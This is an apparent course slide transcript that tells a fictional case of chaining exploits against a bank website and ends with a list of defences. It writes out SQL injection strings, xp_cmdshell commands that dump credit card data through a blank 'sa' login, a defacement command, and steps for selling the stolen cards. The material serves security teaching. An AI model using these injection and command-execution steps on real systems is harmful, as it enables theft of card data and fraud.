Download TEL 283 - Long Island University

Survey
yes no Was this document useful for you?
   Thank you for your participation!

* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project

page
1
page
2
page
3
page
4
page
5
page
6
page
7
page
8
page
9
page
10
page
11
page
12
page
13
page
14
page
15
page
16
page
17
page
18
page
19
page
20
page
21
Document related concepts
no text concepts found
Transcript 
Getting out of Credit Card Debt

Chained Exploits
◦ Whitaker, Evans, Voth; Addison-Wesley, 2009

Methods discussed in course are considered
illegal
◦ Under no circumstances should tools or methods be
utilized on any networked system without the
explicit written permission of an authorized grantor
within that organization
 Document should be witnessed and should delineate
the boundaries of your actions
◦ Signed document for this course indicating that you
understand and appreciate the nature of the
concepts and methodologies

What is the purpose of instructing these
methods and tools?
◦ So that you, as a professional, will understand the
methods and tools and be able to determine
 When and how they were leveraged against you
 Find traces of them during an investigation
 Pro-actively search and deter an attack

Attack consisting of several exploits or
attacks in order to achieve a goal

“Phoenix” (obviously not his real name) is in
debt for thousands of dollars to a bank’s
credit card system, and his rate has just gone
up to 29%
◦ Plans to pay off his debt by hitting the bank’s
system (PDXO Financial)
 If he uses another person’s card to pay off his, it’ll be
noticed
 Plans to steal cc information and sell it on the black
market
1.
2.
3.
4.
5.
Enumerate the website
Enumerate the cc database
Get cc info from the website
Sell the cc info on the underground market
Trash to website (misdirection)

Uncover as much information about the
website as possible
◦ Operating system
◦ Web server version running


RFC 2616 specifies the format of the HTTP
responses
Some headers returned might contain
valuable information regarding the server or
site

Telnet to the website on port 80 (or whatever
port the site is on)
telnet www.PDXOfinancial.com 80

Once connected
◦ Issue the command to receive the site’s HTTP
header
HEAD / http /1.1
[cr]
[cr]

Server type might be revealed
◦ Example show www.marist.edu “HEAD” request

Tool developed by the Cult of the Dead Cow
◦ www.cultdeadcow.com
◦ Uses Google hacking techniques discovered by
Johnny Long (johnny.ihackstuff.com)
 Checks strings against website to find files containing
passwords, vulnerable files, or directories of interest

PDXO merged
◦ Might have development websites running due to
changes





development.PDXOfinancial.com
beta.PDXOfinancial.com
test.PDXOfinancial.com
dev.PDXOfinancial.com
Checking possible sites might result in
bringing up an unprotected web page
◦ In this case, the login form


Is the DB server on the same host as the website?
Is MS SQL server used for DB?
◦ Default username of “SA” w/o password?

Is the website installed in the default IIS location?
◦ inetpub\wwwroot
◦ This directory allows for write access

This presumes several weaknesses
◦ Possible due to page coming from a development site
◦ Moral: build security in, even during the development
phase of the SDLC

The ability of a user to craft an SQL or
database command from the client side


The default database is called “MASTER”
Get the names of the databases in the MASTER
file
select * from master..sysdatabases
◦ The database expects a username prior to this
command, so we need to fool the database into thinking
we’ve already done this
 Supply a command terminator character “;” before the select
command
; select * from master..sysdatabases
◦ Prevent another command from being entered after this
by adding a “comment” indicator after the command “--”
; select * from master..sysdatabases --

The difficulty with the sql command is that
the output would not return
◦ Use “osql”, which is a command line utility
◦ Send the output to a text file

Parameters for osql
◦
◦
◦
◦
-U
-P
-Q
-o
username
password (blank if none supplied)
enter SQL command and exit
output file specified
osql –U sa –P “” –Q “select * from master..sysdatabases” –o
c:\inetpub\wwwroot\output.txt

osql is a command line utility and needs to be
entered at the command prompt
◦ Hacker is not at a command prompt
◦ Can use an SQL stored procedure which will execute
a command
◦ exec xp_cmdshell ‘<command goes here>’

So…
exec xp_cmdshell ‘osql –U sa –P “” –Q “select * from
master..sysdatabases” –o c:\inetpub\wwwroot\output.txt’ --

Phoenix uses the form to submit his SL command
to the webserver
◦ Webserver passes along the command to the database
server for execution w/o verification
◦ Text file is written to the webserver’s document directory


Phoenix changes the URL to that of the output file
on the server in order to browse the contents
Examine the contents and see if there are any
databases of interest
creditcards
C:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF

Now that you have the name of the database
◦ Get the table names by changing the SQL command
select * from creditcards..sysobjects

One of the tables is called “cardnumbers”
select * from creditcards..cardnumbers

The dumped information will be in the
output file on the IIS server
◦ Contains names, expiration dates, CVV’s, CC
numbers, and PINs

Phoenix uses NNTP client (NewsRover) to check alt.2600
newsgroup
◦ Post a message regarding sale of cc info

Set up a bogus email address

Use “spammimmic” to disguise a spammed message
◦ [email protected]
◦ Looks like a spam message, but those in the know will recover the
hidden message using spammimmic
 Can be passwroded with a password or as phony PGP message, or false
Cyrillic text
 This message is posted to alt.2600 using the phony email address

Respondent agrees to pay $12,000 into a Swiss account
◦ Phoenix’s CC number is one of the many cards sold
 Phoenix cancels his card


IIS 5.0 Server
MS SQL Server
◦ Default username of SA w/o password
◦ Hosted on the same host as the website

xp_cmdshell stored procedure will be used to
overwrite the landing page on the website
;exec xp_cmdshell ‘echo You’ve been hacked! >
c:\inetput\wwwroot\default.asp’ --








Change the default HTTP Response header
Do not allow public access to the
development sites
Do not keep the SQL server on the same host
as the IIS server
“Sanitize” / validate user form input
Don’t put IIS in the default location
Make the site read-only
Don’t keep unnecessary stored procedures
Don’t use defaults (username / passwords)
for the database
Related documents
Job Descriptions - Human Resources Department JOB GOAL
Job Descriptions - Human Resources Department JOB GOAL
Business Intelligence and Data Warehousing
Business Intelligence and Data Warehousing
Data Warehouse performance and maintenance
Data Warehouse performance and maintenance
Recruitment Authorisation Form
Recruitment Authorisation Form
mysql> show tables
mysql> show tables
Elements of SQL Data Definition Language
Elements of SQL Data Definition Language
BIS 3204 Database DB Programming
BIS 3204 Database DB Programming
Using Power BI with my DBA Database
Using Power BI with my DBA Database
Implementing and Maintaining Microsoft SQL Server 2008 Analysis
Implementing and Maintaining Microsoft SQL Server 2008 Analysis
Oracle Demo Database Sample Queries
Oracle Demo Database Sample Queries
Vievu/DVMS
Vievu/DVMS
Database Security - Department of Computer Science
Database Security - Department of Computer Science